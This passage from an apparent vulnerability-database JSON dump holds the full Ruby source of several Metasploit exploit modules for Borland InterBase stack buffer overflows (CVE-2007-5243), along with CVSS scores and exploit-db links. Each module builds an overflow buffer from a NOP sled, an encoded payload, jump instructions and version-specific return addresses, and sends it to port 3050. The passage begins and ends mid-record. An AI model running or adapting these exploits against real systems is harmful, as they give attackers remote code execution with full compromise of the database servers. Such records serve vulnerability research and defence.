'Ret' => 0xaabbccdd }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef exploit_target(target)\r\n\r\n\t\ttarget['Length'].each do |length|\r\n\r\n\t\t\tconnect\r\n\r\n\t\t\t# Attach database\r\n\t\t\top_attach = 19\r\n\r\n\t\t\tremainder = length.remainder(4)\r\n\t\t\tpadding = 0\r\n\r\n\t\t\tif remainder > 0\r\n\t\t\t\tpadding = (4 - remainder)\r\n\t\t\tend\r\n\r\n\t\t\tbuf = ''\r\n\r\n\t\t\t# Operation/packet 
type\r\n\t\t\tbuf << [op_attach].pack('N')\r\n\r\n\t\t\t# Id\r\n\t\t\tbuf << [0].pack('N')\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [length].pack('N')\r\n\r\n\t\t\t# Nop block\r\n\t\t\tbuf << make_nops(length - payload.encoded.length - 13)\r\n\r\n\t\t\t# Payload\r\n\t\t\tbuf << payload.encoded\r\n\r\n\t\t\t# Jump back into the nop block\r\n\t\t\tbuf << \"\\xe9\" + [-1028].pack('V')\r\n\r\n\t\t\t# Jump back\r\n\t\t\tbuf << \"\\xeb\" + [-7].pack('c')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(2)\r\n\r\n\t\t\t# Target\r\n\t\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t\t# Padding\r\n\t\t\tbuf << \"\\x00\" * padding\r\n\r\n\t\t\t# Database parameter block\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [1024].pack('N')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(1024)\r\n\r\n\t\t\tsock.put(buf)\r\n\r\n\t\t\tselect(nil,nil,nil,4)\r\n\r\n\t\t\thandler\r\n\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16447/"}, {"lastseen": "2016-02-01T23:53:41", "description": "Borland InterBase SVC_attach() Buffer Overflow. CVE-2007-5243. Remote exploit for windows platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Borland InterBase SVC_attach Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16449", "href": "https://www.exploit-db.com/exploits/16449/", "sourceData": "##\r\n# $Id: ib_svc_attach.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::BruteTargets\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Borland InterBase SVC_attach() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted service attach request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'win',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38605' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Brute Force', { } ],\r\n\t\t\t\t\t# 0x00403d4b pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V8.1.0.257',\r\n\t\t\t\t\t\t{ 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403d4b }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403d4d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V8.0.0.123',\r\n\t\t\t\t\t\t{ 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403d4d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403a5d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80',\r\n\t\t\t\t\t\t{ 
'Length' => [ 3660, 3664 ], 'Ret' => 0x00403a5d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x004038fd pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V7.0.1.1',\r\n\t\t\t\t\t\t{ 'Length' => [ 3660, 3664 ], 'Ret' => 0x004038fd }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x0040390d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.5.0.28',\r\n\t\t\t\t\t\t{ 'Length' => [ 2116, 2120], 'Ret' => 0x0040390d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403901 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.0.1.6',\r\n\t\t\t\t\t\t{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403901 }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x004038b1 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0',\r\n\t\t\t\t\t\t{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x004038b1 }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00404a10 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V5.5.0.742',\r\n\t\t\t\t\t\t{ 'Length' => [ 2216, 2120 ], 'Ret' => 0x00404a10 }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00404a0e pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V5.1.1.680',\r\n\t\t\t\t\t\t{ 'Length' => [ 2120, 2124 ], 'Ret' => 0x00404a0e }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# Debug\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Debug',\r\n\t\t\t\t\t\t{ 'Length' => [ 2120 ], 'Ret' => 0xaabbccdd }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef exploit_target(target)\r\n\r\n\t\ttarget['Length'].each do |length|\r\n\r\n\t\t\tconnect\r\n\r\n\t\t\t# Attach database\r\n\t\t\top_attach = 19\r\n\r\n\t\t\t# Create database\r\n\t\t\top_create = 20\r\n\r\n\t\t\t# Service attach\r\n\t\t\top_service_attach = 82\r\n\r\n\t\t\tremainder = length.remainder(4)\r\n\t\t\tpadding = 0\r\n\r\n\t\t\tif remainder > 
0\r\n\t\t\t\tpadding = (4 - remainder)\r\n\t\t\tend\r\n\r\n\t\t\tbuf = ''\r\n\r\n\t\t\t# Operation/packet type\r\n\t\t\tbuf << [op_service_attach].pack('N')\r\n\r\n\t\t\t# Id\r\n\t\t\tbuf << [0].pack('N')\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [length].pack('N')\r\n\r\n\t\t\t# Nop block\r\n\t\t\tbuf << make_nops(length - payload.encoded.length - 13)\r\n\r\n\t\t\t# Payload\r\n\t\t\tbuf << payload.encoded\r\n\r\n\t\t\t# Jump back into the nop block\r\n\t\t\tbuf << \"\\xe9\" + [-1028].pack('V')\r\n\r\n\t\t\t# Jump back\r\n\t\t\tbuf << \"\\xeb\" + [-7].pack('c')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(2)\r\n\r\n\t\t\t# Target\r\n\t\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t\t# Padding\r\n\t\t\tbuf << \"\\x00\" * padding\r\n\r\n\t\t\t# Database parameter block\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [1024].pack('N')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(1024)\r\n\r\n\t\t\tsock.put(buf)\r\n\r\n\t\t\tselect(nil,nil,nil,4)\r\n\r\n\t\t\thandler\r\n\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16449/"}, {"lastseen": "2016-02-02T06:38:01", "description": "Borland InterBase PWD_db_aliased() Buffer Overflow. CVE-2007-5243. Remote exploit for linux platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Borland InterBase PWD_db_aliased Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16839", "href": "https://www.exploit-db.com/exploits/16839/", "sourceData": "##\r\n# $Id: ib_pwd_db_aliased.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Borland InterBase PWD_db_aliased() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted attach request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'linux',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38607' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t# 0x0804cbe4 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',\r\n\t\t\t\t\t\t{ 'Ret' => 0x0804cbe4 }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\t# Attach database\r\n\t\top_attach = 19\r\n\r\n\t\tlength = 1152\r\n\t\tremainder = length.remainder(4)\r\n\t\tpadding = 0\r\n\r\n\t\tif remainder > 0\r\n\t\t\tpadding = (4 - 
remainder)\r\n\t\tend\r\n\r\n\t\tbuf = ''\r\n\r\n\t\t# Operation/packet type\r\n\t\tbuf << [op_attach].pack('N')\r\n\r\n\t\t# Id\r\n\t\tbuf << [0].pack('N')\r\n\r\n\t\t# Length\r\n\t\tbuf << [length].pack('N')\r\n\r\n\t\t# It will return into this nop block\r\n\t\tbuf << make_nops(length - payload.encoded.length - 4)\r\n\r\n\t\t# Payload\r\n\t\tbuf << payload.encoded\r\n\r\n\t\t# Target\r\n\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t# Padding\r\n\t\tbuf << \"\\x00\" * padding\r\n\r\n\t\t# Length\r\n\t\tbuf << [1024].pack('N')\r\n\r\n\t\t# Random alpha data\r\n\t\tbuf << rand_text_alpha(1024)\r\n\r\n\t\tsock.put(buf)\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16839/"}, {"lastseen": "2016-02-02T06:38:43", "description": "Borland InterBase jrd8_create_database() Buffer Overflow. CVE-2007-5243. Remote exploit for linux platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Borland InterBase jrd8_create_database Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16843", "href": "https://www.exploit-db.com/exploits/16843/", "sourceData": "##\r\n# $Id: ib_jrd8_create_database.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Borland InterBase jrd8_create_database() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted create request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'linux',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38606' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 128,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t# 0x0804cbe4 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',\r\n\t\t\t\t\t\t{ 'Ret' => 0x0804cbe4 }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\t# Create database\r\n\t\top_create = 20\r\n\r\n\t\tlength = 544\r\n\t\tremainder = length.remainder(4)\r\n\t\tpadding = 0\r\n\r\n\t\tif remainder > 0\r\n\t\t\tpadding = (4 - 
remainder)\r\n\t\tend\r\n\r\n\t\tbuf = ''\r\n\r\n\t\t# Operation/packet type\r\n\t\tbuf << [op_create].pack('N')\r\n\r\n\t\t# Id\r\n\t\tbuf << [0].pack('N')\r\n\r\n\t\t# Length\r\n\t\tbuf << [length].pack('N')\r\n\r\n\t\t# It will return into this nop block\r\n\t\tbuf << make_nops(length - payload.encoded.length - 4)\r\n\r\n\t\t# Payload\r\n\t\tbuf << payload.encoded\r\n\r\n\t\t# Target\r\n\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t# Padding\r\n\t\tbuf << \"\\x00\" * padding\r\n\r\n\t\t# Database parameter block\r\n\r\n\t\t# Length\r\n\t\tbuf << [1024 * 32].pack('N')\r\n\r\n\t\t# Random alpha data\r\n\t\tbuf << rand_text_alpha(1024 * 32)\r\n\r\n\t\tsock.put(buf)\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16843/"}, {"lastseen": "2016-02-02T06:38:53", "description": "Borland InterBase INET_connect() Buffer Overflow. CVE-2007-5243. Remote exploit for linux platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Borland InterBase INET_connect Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16844", "href": "https://www.exploit-db.com/exploits/16844/", "sourceData": "##\r\n# $Id: ib_inet_connect.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Borland InterBase INET_connect() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted service attach request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'linux',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38605' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t# 0x0804d2ee 5b5e5f5dc3\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',\r\n\t\t\t\t\t\t{ 'Ret' => 0x0804d2ee }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\t# Attach database\r\n\t\top_attach = 19\r\n\r\n\t\t# Create database\r\n\t\top_create = 20\r\n\r\n\t\t# Service attach\r\n\t\top_service_attach = 82\r\n\r\n\t\tlength = 161\r\n\t\tremainder = 
length.remainder(4)\r\n\t\tpadding = 0\r\n\r\n\t\tif remainder > 0\r\n\t\t\tpadding = (4 - remainder)\r\n\t\tend\r\n\r\n\t\tbuf = ''\r\n\r\n\t\t# Operation/packet type\r\n\t\tbuf << [op_service_attach].pack('N')\r\n\r\n\t\t# Id\r\n\t\tbuf << [0].pack('N')\r\n\r\n\t\t# Length\r\n\t\tbuf << [length].pack('N')\r\n\r\n\t\t# Random alpha data\r\n\t\tbuf << rand_text_alpha(length - 5)\r\n\r\n\t\t# Target\r\n\t\tbuf << [target.ret].pack('L')\r\n\r\n\t\t# Separator\r\n\t\tbuf << ':'\r\n\r\n\t\t# Padding\r\n\t\tbuf << \"\\x00\" * padding\r\n\r\n\t\t# Database parameter block\r\n\r\n\t\t# Length\r\n\t\tbuf << [1024].pack('N')\r\n\r\n\t\t# It will return into this nop block\r\n\t\tbuf << make_nops(1024 - payload.encoded.length)\r\n\r\n\t\t# Payload\r\n\t\tbuf << payload.encoded\r\n\r\n\t\tsock.put(buf)\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16844/"}, {"lastseen": "2016-02-01T11:36:59", "description": "Borland InterBase 2007 PWD_db_aliased Buffer Overflow. CVE-2007-5243. Remote exploit for linux platform", "published": "2007-10-03T00:00:00", "type": "exploitdb", "title": "Borland InterBase 2007 - PWD_db_aliased Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2007-10-03T00:00:00", "id": "EDB-ID:9954", "href": "https://www.exploit-db.com/exploits/9954/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Borland InterBase PWD_db_aliased() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted attach request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision$',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'linux',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38607' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t# 0x0804cbe4 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',\r\n\t\t\t\t\t\t{ 'Ret' => 0x0804cbe4 }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\t# Attach database\r\n\t\top_attach = 19\r\n\r\n\t\tlength = 1152\r\n\t\tremainder = length.remainder(4)\r\n\t\tpadding = 0\r\n\r\n\t\tif remainder > 0\r\n\t\t\tpadding = (4 - remainder)\r\n\t\tend\r\n\r\n\t\tbuf = ''\r\n\r\n\t\t# Operation/packet type\r\n\t\tbuf << 
[op_attach].pack('N')\r\n\r\n\t\t# Id\r\n\t\tbuf << [0].pack('N')\r\n\r\n\t\t# Length\r\n\t\tbuf << [length].pack('N')\r\n\r\n\t\t# It will return into this nop block\r\n\t\tbuf << make_nops(length - payload.encoded.length - 4)\r\n\r\n\t\t# Payload\r\n\t\tbuf << payload.encoded\r\n\r\n\t\t# Target\r\n\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t# Padding\r\n\t\tbuf << \"\\x00\" * padding\r\n\r\n\t\t# Length\r\n\t\tbuf << [1024].pack('N')\r\n\r\n\t\t# Random alpha data\r\n\t\tbuf << rand_text_alpha(1024)\r\n\r\n\t\tsock.put(buf)\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9954/"}], "metasploit": [{"lastseen": "2020-10-06T05:16:45", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Firebird Relational Database isc_attach_database() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/MISC/FB_ISC_ATTACH_DATABASE", "href": "", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/fb_isc_attach_database.rb"}, {"lastseen": "2020-03-23T19:49:28", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.\n", "published": "2007-10-04T03:03:13", "type": "metasploit", "title": "Borland InterBase isc_create_database() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/MISC/IB_ISC_CREATE_DATABASE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current 
